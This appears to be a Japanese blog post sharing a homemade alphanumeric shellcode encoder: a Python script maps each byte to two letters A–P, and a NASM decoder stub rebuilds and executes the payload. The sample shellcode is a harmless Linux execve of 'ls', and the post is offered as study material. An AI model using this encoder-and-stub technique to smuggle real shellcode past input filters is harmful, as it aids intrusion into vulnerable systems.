自作alphanumeric shellcode encoder
昔シェルコードの勉強をしているときに、文字列だけで構成する方法が The Art of Hacking に書いてありました。冒頭部分しか書いてなかった(と思う)ので、勝手に自分で完成させたのですが、誰かの参考になれば幸いです。
たどたどしい説明と変なコードですが。
ちなみにディスアセンブルはここが便利です。
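#!/usr/bin/python
# understanding the alphanumeric shellcode concept
'''
[i] going to split each hex in the shellcode in 2 part.
For example, 0x31 is going to be 0011/0001 in bin. then, add 0x41 for converting to chars

Sample run (first list: each byte in binary; second list: the nibble pairs
the script prints; then the letters and the hex form of the encoded bytes):

['00110001', '11000000', '01010000', '01101000', '00101111', '00101111', '01101100', '01110011', '01101000', '00101111', '01100010', '01101001', '01101110', '10001001', '11100011', '01010000', '10001001', '11100010', '01010011', '10001001', '11100001', '10110000', '00001011', '11001101', '10000000']
[['0011', '0001'], ['1100', '0000'], ['0101', '0000'], ['0110', '1000'], ['0010', '1111'], ['0010', '1111'], ['0110', '1100'], ['0111', '0011'], ['0110', '1000'], ['0010', '1111'], ['0110', '0010'], ['0110', '1001'], ['0110', '1110'], ['1000', '1001'], ['1110', '0011'], ['0101', '0000'], ['1000', '1001'], ['1110', '0010'], ['0101', '0011'], ['1000', '1001'], ['1110', '0001'], ['1011', '0000'], ['0000', '1011'], ['1100', '1101'], ['1000', '0000']]
printing obfuscated chars
DBMAFAGICPCPGMHDGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA
alpha shellcode
0x44,0x42,0x4d,0x41,0x46,0x41,0x47,0x49,0x43,0x50,0x43,0x50,0x47,0x4d,0x48,0x44,0x47,0x49,0x43,0x50,0x47,0x43,0x47,0x4a,0x47,0x4f,0x49,0x4a,0x4f,0x44,0x46,0x41,0x49,0x4a,0x4f,0x43,0x46,0x44,0x49,0x4a,0x4f,0x42,0x4c,0x41,0x41,0x4c,0x4d,0x4e,0x49,0x41,
[Finished in 0.1s]
'''
from __future__ import print_function

# Offset added to every 4-bit nibble: 0x0..0xF maps onto 'A'..'P' (0x41..0x50).
ALPHA_BASE = 0x41

# Sample payload (Linux x86 execve of "/bin//ls").  Written as a bytes literal so
# that bytearray() accepts it on Python 3 as well as Python 2; the original str
# literal only worked on Python 2.
data = b"\x31\xc0\x50\x68\x2f\x2f\x6c\x73\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"


def split_nibbles(byte):
    """Return the (high, low) 4-bit halves of an 8-bit integer."""
    return byte >> 4, byte & 0x0F


def encode_alphanumeric(shellcode):
    """Encode raw bytes as two letters per byte.

    Each byte is split into its high and low nibble and ALPHA_BASE (0x41) is
    added to each half, so the result only uses 'A'..'P'.  This is a fixed,
    reversible mapping (the decoder stub in alpha.nasm undoes it) - an
    encoding, not a protection: the 2x size growth and the 16-letter alphabet
    make the scheme easy to recognise.

    Args:
        shellcode: bytes, bytearray or (Python 2) str holding raw bytes.

    Returns:
        list of ints in 0x41..0x50, two per input byte, high nibble first.
        Empty input yields [].
    """
    encoded = []
    for byte in bytearray(shellcode):
        high, low = split_nibbles(byte)
        encoded.append(high + ALPHA_BASE)
        encoded.append(low + ALPHA_BASE)
    return encoded


# Debug view kept from the original script: each byte as a pair of 4-bit strings.
test = [['{:04b}'.format(high), '{:04b}'.format(low)]
        for high, low in (split_nibbles(b) for b in bytearray(data))]
print(test)

# 'final' holds the encoded values as '0x..' strings, as the original script did.
final = [hex(value) for value in encode_alphanumeric(data)]

obfuscated_chars = "".join(chr(int(code, 16)) for code in final)
alphanumeric_encoded = "".join(code + "," for code in final)  # .replace("0x", "\\x")
print(obfuscated_chars)
print(alphanumeric_encoded)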
だいぶ前に書いたので、自分でも謎な部分があります。
; Filename: alpha.nasm
;
; Purpose: to understand alphanumeric shellcode
;
; Layout: a small decoder stub is followed by the encoded payload (label
; Shellcode).  Every payload byte was split into two nibbles and 0x41 ('A')
; was added to each, so the payload only contains 'A'..'P'.  The stub rebuilds
; the original bytes in place (output index k is built from input chars 2k and
; 2k+1) and then calls the decoded buffer.
; NOTE: only the payload bytes are alphanumeric.  The stub itself is ordinary
; x86 code (jmp/pop/call/...), so the combined blob is NOT a pure alphanumeric
; shellcode; it only demonstrates the encoding idea.

global _start

section .text

_start:
    jmp short call_decoder

decoder:
    pop esi                     ; return address pushed by "call decoder" = address of Shellcode
    push esi                    ; keep the buffer start; "final" pops it back and calls it
    ; encoded payload: "DBMAFAGICPCPGMHDGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA"
    ; (string corrected to match the db bytes below)
    lea edi, [esi+1]            ; edi -> second char, i.e. the low-nibble letter of byte 0
    ; "BMAFAGICPCPGMHDGICPGCGJGOIJODFAIJOCFDIJOBLAALMNIA"
    xor eax,eax
    xor ebx,ebx
    mov al,1                    ; eax = index of the next high-nibble letter relative to esi;
                                ; used by "[esi+eax]" below and bumped by "add al,1".
                                ; Only al is touched, so it wraps after 255 iterations -
                                ; enough for this 25-byte payload, not for a large one.

decode:
    mov bl,byte [esi]           ; first letter (high nibble) into bl
    sub bl, 41h                 ; undo the +0x41 -> value 0..15
    shl bl, 4                   ; move it into the high nibble
    add bl,byte [edi]           ; add the second letter (low nibble)
    sub bl, 41h                 ; undo its +0x41
    mov byte [esi],bl           ; decoded byte 0 written back in place over the first letter

decode_second:
    inc esi                     ; next output slot (base+k)
    inc edi
    inc edi                     ; next low-nibble letter (base+2k+1)
    cmp byte [edi], 0x41        ; SF is set when [edi]-0x41 is negative as a signed byte:
    js final                    ; true for the 0x40 terminators, false for every 'A'..'P'.
                                ; edi only ever visits odd offsets, which is why two 0x40
                                ; bytes are appended.  A byte >= 0xC1 would also stop the
                                ; loop, but the encoder never emits one.
    mov bl,byte [esi+eax]       ; high-nibble letter at base+2k (eax == k)
    sub bl, 41h
    shl bl, 4
    add bl,byte [edi]           ; low-nibble letter at base+2k+1
    sub bl, 41h
    mov byte [esi],bl           ; decoded byte k -> base+k; safe in place because the
                                ; write offset k never overtakes the read offset 2k
    add al,1
    jmp short decode_second

final:
    pop esi                     ; buffer start saved by "push esi" above
    call esi                    ; transfer control to the decoded payload

call_decoder:
    call decoder                ; pushes the address of Shellcode as the return address

; 50 encoded letters ('A'..'P') followed by two 0x40 terminators for the js check.
Shellcode: db 0x44,0x42,0x4d,0x41,0x46,0x41,0x47,0x49,0x43,0x50,0x43,0x50,0x47,0x4d,0x48,0x44,0x47,0x49,0x43,0x50,0x47,0x43,0x47,0x4a,0x47,0x4f,0x49,0x4a,0x4f,0x44,0x46,0x41,0x49,0x4a,0x4f,0x43,0x46,0x44,0x49,0x4a,0x4f,0x42,0x4c,0x41,0x41,0x4c,0x4d,0x4e,0x49,0x41,0x40,0x40